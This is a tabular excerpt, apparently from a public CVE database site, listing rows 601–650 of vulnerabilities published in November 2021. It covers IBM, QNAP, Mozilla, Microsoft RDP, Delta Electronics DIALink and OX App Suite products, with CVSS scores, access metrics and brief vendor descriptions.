| # |
CVE ID
|
CWE ID
|
# of Exploits
|
Vulnerability Type(s)
|
Publish Date
|
Update Date
|
Score
|
Gained Access Level
|
Access
|
Complexity
|
Authentication
|
Conf.
|
Integ.
|
Avail.
|
|
601 |
CVE-2021-38975 |
200 |
|
+Info |
2021-11-15 |
2021-11-16 |
4.0 |
None |
Remote |
Low |
??? |
Partial |
None |
None |
|
IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 could allow an authenticated user to to obtain sensitive information from a specially crafted HTTP request. IBM X-Force ID: 212780. |
|
602 |
CVE-2021-38974 |
|
|
DoS |
2021-11-15 |
2021-11-16 |
4.0 |
None |
Remote |
Low |
??? |
None |
None |
Partial |
|
IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 could allow an authenticated user to cause a denial of service using specially crafted HTTP requests. IBM X-Force ID: 212779. |
|
603 |
CVE-2021-38973 |
20 |
|
|
2021-11-12 |
2021-11-16 |
4.0 |
None |
Remote |
Low |
??? |
None |
Partial |
None |
|
IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
|
604 |
CVE-2021-38972 |
20 |
|
|
2021-11-12 |
2021-11-16 |
4.0 |
None |
Remote |
Low |
??? |
None |
Partial |
None |
|
IBM Tivoli Key Lifecycle Manager 3.0, 3.0.1, 4.0, and 4.1 receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
|
605 |
CVE-2021-38967 |
94 |
|
Exec Code |
2021-11-30 |
2021-11-30 |
4.6 |
None |
Local |
Low |
Not required |
Partial |
Partial |
Partial |
|
IBM MQ Appliance 9.2 CD and 9.2 LTS could allow a local privileged user to inject and execute malicious code. IBM X-Force ID: 212441. |
|
606 |
CVE-2021-38959 |
787 |
|
DoS |
2021-11-17 |
2021-11-19 |
2.1 |
None |
Local |
Low |
Not required |
None |
None |
Partial |
|
IBM SPSS Statistics for Windows 24.0, 25.0, 26.0, 27.0, 27.0.1, and 28.0 could allow a local user to cause a denial of service by writing arbitrary files to admin protected directories on the system. IBM X-Force ID: 212046. |
|
607 |
CVE-2021-38958 |
|
|
DoS |
2021-11-30 |
2021-11-30 |
2.1 |
None |
Local |
Low |
Not required |
None |
None |
Partial |
|
IBM MQ Appliance 9.2 CD and 9.2 LTS is affected by a denial of service attack caused by a concurrency issue. IBM X-Force ID: 212042 |
|
608 |
CVE-2021-38949 |
312 |
|
|
2021-11-16 |
2021-11-17 |
2.1 |
None |
Local |
Low |
Not required |
Partial |
None |
None |
|
IBM MQ 7.5, 8.0, 9.0 LTS, 9.1 CD, and 9.1 LTS stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 211403. |
|
609 |
CVE-2021-38948 |
91 |
|
|
2021-11-02 |
2021-11-03 |
6.4 |
None |
Remote |
Low |
Not required |
Partial |
None |
Partial |
|
IBM InfoSphere Information Server 11.7 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 211402. |
|
610 |
CVE-2021-38891 |
326 |
|
|
2021-11-23 |
2021-11-29 |
5.0 |
None |
Remote |
Low |
Not required |
Partial |
None |
None |
|
IBM Sterling Connect:Direct Web Services 1.0 and 6.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 209508. |
|
611 |
CVE-2021-38890 |
307 |
|
|
2021-11-23 |
2021-11-29 |
5.0 |
None |
Remote |
Low |
Not required |
Partial |
None |
None |
|
IBM Sterling Connect:Direct Web Services 1.0 and 6.0 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 209507. |
|
612 |
CVE-2021-38887 |
200 |
|
+Info |
2021-11-10 |
2021-11-12 |
4.0 |
None |
Remote |
Low |
??? |
Partial |
None |
None |
|
IBM InfoSphere Information Server 11.7 could allow an authenticated user to obtain sensitive information from application response requests that could be used in further attacks against the system. IBM X-Force ID: 209401. |
|
613 |
CVE-2021-38882 |
|
|
|
2021-11-16 |
2021-11-17 |
2.1 |
None |
Local |
Low |
Not required |
None |
Partial |
None |
|
IBM Spectrum Scale 5.1.0 through 5.1.1.1 could allow a privileged admin to destroy filesystem audit logging records before expiration time. IBM X-Force ID: 209164. |
|
614 |
CVE-2021-38875 |
|
|
DoS |
2021-11-23 |
2021-11-24 |
4.0 |
None |
Remote |
Low |
??? |
None |
None |
Partial |
|
IBM MQ 8.0, 9.0 LTS, 9.1 LTS, 9.2 LTS, 9.1 CD, and 9.2 CD is vulnerable to a denial of service attack caused by an error processing messages. IBM X-Force ID: 208398. |
|
615 |
CVE-2021-38873 |
74 |
|
Exec Code |
2021-11-24 |
2021-11-24 |
9.3 |
None |
Remote |
Medium |
Not required |
Complete |
Complete |
Complete |
|
IBM Planning Analytics 2.0 is potentially vulnerable to CSV Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 208396. |
|
616 |
CVE-2021-38847 |
434 |
|
Exec Code |
2021-11-01 |
2021-11-02 |
6.5 |
None |
Remote |
Low |
??? |
Partial |
Partial |
Partial |
|
S-Cart v6.4.1 and below was discovered to contain an arbitrary file upload vulnerability in the Editor module on the Admin panel. This vulnerability allows attackers to execute arbitrary code via a crafted IMG file. |
|
617 |
CVE-2021-38686 |
287 |
|
|
2021-11-26 |
2021-12-03 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
|
An improper authentication vulnerability has been reported to affect QNAP device, VioStor. If exploited, this vulnerability allows attackers to compromise the security of the system. We have already fixed this vulnerability in the following versions of QVR: QVR FW 5.1.6 build 20211109 and later |
|
618 |
CVE-2021-38685 |
78 |
|
|
2021-11-26 |
2021-12-02 |
7.5 |
None |
Remote |
Low |
Not required |
Partial |
Partial |
Partial |
|
A command injection vulnerability has been reported to affect QNAP device, VioStor. If exploited, this vulnerability allows remote attackers to run arbitrary commands. We have already fixed this vulnerability in the following versions of QVR: QVR FW 5.1.6 build 20211109 and later |
|
619 |
CVE-2021-38684 |
787 |
|
Exec Code Overflow |
2021-11-13 |
2022-02-10 |
7.5 |
None |
Remote |
Low |
Not required |
Partial |
Partial |
Partial |
|
A stack buffer overflow vulnerability has been reported to affect QNAP NAS running Multimedia Console. If exploited, this vulnerability allows attackers to execute arbitrary code. We have already fixed this vulnerability in the following versions of Multimedia Console: Multimedia Console 1.4.3 ( 2021/10/05 ) and later Multimedia Console 1.5.3 ( 2021/10/05 ) and later |
|
620 |
CVE-2021-38681 |
79 |
|
XSS |
2021-11-20 |
2021-11-23 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
|
A reflected cross-site scripting (XSS) vulnerability has been reported to affect QNAP NAS running Ragic Cloud DB. If exploited, this vulnerability allows remote attackers to inject malicious code. QNAP have already disabled and removed Ragic Cloud DB from the QNAP App Center, pending a security patch from Ragic. |
|
621 |
CVE-2021-38666 |
|
|
Exec Code |
2021-11-10 |
2021-11-10 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
|
Remote Desktop Client Remote Code Execution Vulnerability |
|
622 |
CVE-2021-38665 |
|
|
|
2021-11-10 |
2021-11-10 |
4.3 |
None |
Remote |
Medium |
Not required |
Partial |
None |
None |
|
Remote Desktop Protocol Client Information Disclosure Vulnerability |
|
623 |
CVE-2021-38631 |
|
|
|
2021-11-10 |
2021-11-12 |
2.1 |
None |
Local |
Low |
Not required |
Partial |
None |
None |
|
Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-41371. |
|
624 |
CVE-2021-38502 |
522 |
|
Exec Code |
2021-11-03 |
2022-03-17 |
4.3 |
None |
Remote |
Medium |
Not required |
Partial |
None |
None |
|
Thunderbird ignored the configuration to require STARTTLS security for an SMTP connection. A MITM could perform a downgrade attack to intercept transmitted messages, or could take control of the authenticated session to execute SMTP commands chosen by the MITM. If an unprotected authentication method was configured, the MITM could obtain the authentication credentials, too. This vulnerability affects Thunderbird < 91.2. |
|
625 |
CVE-2021-38501 |
|
|
Mem. Corr. |
2021-11-03 |
2021-11-04 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
|
Mozilla developers reported memory safety bugs present in Firefox 92 and Firefox ESR 91.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 93, Thunderbird < 91.2, and Firefox ESR < 91.2. |
|
626 |
CVE-2021-38500 |
|
|
Mem. Corr. |
2021-11-03 |
2022-03-17 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
|
Mozilla developers reported memory safety bugs present in Firefox 92 and Firefox ESR 91.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird < 78.15, Thunderbird < 91.2, Firefox ESR < 91.2, Firefox ESR < 78.15, and Firefox < 93. |
|
627 |
CVE-2021-38499 |
787 |
|
Mem. Corr. |
2021-11-03 |
2022-05-03 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
|
Mozilla developers reported memory safety bugs present in Firefox 92. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 93. |
|
628 |
CVE-2021-38498 |
416 |
|
Mem. Corr. |
2021-11-03 |
2021-11-04 |
5.0 |
None |
Remote |
Low |
Not required |
None |
None |
Partial |
|
During process shutdown, a document could have caused a use-after-free of a languages service object, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox < 93, Thunderbird < 91.2, and Firefox ESR < 91.2. |
|
629 |
CVE-2021-38497 |
346 |
|
|
2021-11-03 |
2021-11-04 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
|
Through use of reportValidity() and window.open(), a plain-text validation message could have been overlaid on another origin, leading to possible user confusion and spoofing attacks. This vulnerability affects Firefox < 93, Thunderbird < 91.2, and Firefox ESR < 91.2. |
|
630 |
CVE-2021-38496 |
416 |
|
Mem. Corr. |
2021-11-03 |
2022-03-17 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
|
During operations on MessageTasks, a task may have been removed while it was still scheduled, resulting in memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 78.15, Thunderbird < 91.2, Firefox ESR < 91.2, Firefox ESR < 78.15, and Firefox < 93. |
|
631 |
CVE-2021-38495 |
787 |
|
Mem. Corr. |
2021-11-03 |
2022-05-03 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
|
Mozilla developers reported memory safety bugs present in Thunderbird 78.13.0. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird < 91.1 and Firefox ESR < 91.1. |
|
632 |
CVE-2021-38494 |
787 |
|
Mem. Corr. |
2021-11-03 |
2022-05-03 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
|
Mozilla developers reported memory safety bugs present in Firefox 91. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 92. |
|
633 |
CVE-2021-38493 |
787 |
|
Mem. Corr. |
2021-11-03 |
2022-05-03 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
|
Mozilla developers reported memory safety bugs present in Firefox 91 and Firefox ESR 78.13. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 78.14, Thunderbird < 78.14, and Firefox < 92. |
|
634 |
CVE-2021-38492 |
|
|
|
2021-11-03 |
2021-11-04 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
|
When delegating navigations to the operating system, Firefox would accept the `mk` scheme which might allow attackers to launch pages and execute scripts in Internet Explorer in unprivileged mode. *This bug only affects Firefox for Windows. Other operating systems are unaffected.*. This vulnerability affects Firefox < 92, Thunderbird < 91.1, Thunderbird < 78.14, Firefox ESR < 78.14, and Firefox ESR < 91.1. |
|
635 |
CVE-2021-38491 |
|
|
|
2021-11-03 |
2022-03-16 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
|
Mixed-content checks were unable to analyze opaque origins which led to some mixed content being loaded. This vulnerability affects Firefox < 92. |
|
636 |
CVE-2021-38488 |
79 |
|
Exec Code XSS |
2021-11-03 |
2021-11-05 |
3.5 |
None |
Remote |
Medium |
??? |
None |
Partial |
None |
|
Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the parameter comment of the API events, which may allow an attacker to remotely execute code. |
|
637 |
CVE-2021-38448 |
94 |
|
|
2021-11-22 |
2022-05-10 |
4.6 |
None |
Local |
Low |
Not required |
Partial |
Partial |
Partial |
|
The affected controllers do not properly sanitize the input containing code syntax. As a result, an attacker could craft code to alter the intended controller flow of the software. |
|
638 |
CVE-2021-38428 |
79 |
|
Exec Code XSS |
2021-11-03 |
2021-11-05 |
3.5 |
None |
Remote |
Medium |
??? |
None |
Partial |
None |
|
Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the parameter name of the API schedule, which may allow an attacker to remotely execute code. |
|
639 |
CVE-2021-38424 |
1236 |
|
|
2021-11-03 |
2021-11-05 |
6.8 |
None |
Remote |
Medium |
Not required |
Partial |
Partial |
Partial |
|
The tag interface of Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to an attacker injecting formulas into the tag data. Those formulas may then be executed when it is opened with a spreadsheet application. |
|
640 |
CVE-2021-38422 |
312 |
|
|
2021-11-03 |
2021-11-05 |
4.6 |
None |
Local |
Low |
Not required |
Partial |
Partial |
Partial |
|
Delta Electronics DIALink versions 1.2.4.0 and prior stores sensitive information in cleartext, which may allow an attacker to have extensive access to the application directory and escalate privileges. |
|
641 |
CVE-2021-38420 |
276 |
|
|
2021-11-03 |
2021-11-05 |
4.6 |
None |
Local |
Low |
Not required |
Partial |
Partial |
Partial |
|
Delta Electronics DIALink versions 1.2.4.0 and prior default permissions give extensive permissions to low-privileged user accounts, which may allow an attacker to modify the installation directory and upload malicious files. |
|
642 |
CVE-2021-38418 |
319 |
|
|
2021-11-03 |
2021-11-05 |
4.3 |
None |
Remote |
Medium |
Not required |
Partial |
None |
None |
|
Delta Electronics DIALink versions 1.2.4.0 and prior runs by default on HTTP, which may allow an attacker to be positioned between the traffic and perform a machine-in-the-middle attack to access information without authorization. |
|
643 |
CVE-2021-38416 |
427 |
|
|
2021-11-03 |
2021-11-05 |
4.4 |
None |
Local |
Medium |
Not required |
Partial |
Partial |
Partial |
|
Delta Electronics DIALink versions 1.2.4.0 and prior insecurely loads libraries, which may allow an attacker to use DLL hijacking and takeover the system where the software is installed. |
|
644 |
CVE-2021-38411 |
79 |
|
Exec Code XSS |
2021-11-03 |
2021-11-05 |
3.5 |
None |
Remote |
Medium |
??? |
None |
Partial |
None |
|
Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the parameter deviceName of the API modbusWriter-Reader, which may allow an attacker to remotely execute code. |
|
645 |
CVE-2021-38407 |
79 |
|
Exec Code XSS |
2021-11-03 |
2021-11-05 |
3.5 |
None |
Remote |
Medium |
??? |
None |
Partial |
None |
|
Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the parameter name of the API devices, which may allow an attacker to remotely execute code. |
|
646 |
CVE-2021-38403 |
79 |
|
Exec Code XSS |
2021-11-03 |
2021-11-05 |
3.5 |
None |
Remote |
Medium |
??? |
None |
Partial |
None |
|
Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to cross-site scripting because an authenticated attacker can inject arbitrary JavaScript code into the parameter supplier of the API maintenance, which may allow an attacker to remotely execute code. |
|
647 |
CVE-2021-38378 |
668 |
|
|
2021-11-22 |
2021-11-23 |
4.0 |
None |
Remote |
Low |
??? |
Partial |
None |
None |
|
OX App Suite 7.10.5 allows Information Exposure because a caching mechanism can caused a Modified By response to show a person's name. |
|
648 |
CVE-2021-38377 |
79 |
|
XSS |
2021-11-22 |
2021-11-23 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
|
OX App Suite through 7.10.5 allows XSS via JavaScript code in an anchor HTML comment within truncated e-mail, because there is a predictable UUID with HTML transformation results. |
|
649 |
CVE-2021-38376 |
668 |
|
|
2021-11-22 |
2021-11-23 |
5.0 |
None |
Remote |
Low |
Not required |
Partial |
None |
None |
|
OX App Suite through 7.10.5 has Incorrect Access Control for retrieval of session information via the rampup action of the login API call. |
|
650 |
CVE-2021-38375 |
79 |
|
XSS |
2021-11-22 |
2021-11-23 |
4.3 |
None |
Remote |
Medium |
Not required |
None |
Partial |
None |
|
OX App Suite through 7.10.5 allows XSS via the alt attribute of an IMG element in a truncated e-mail message. |
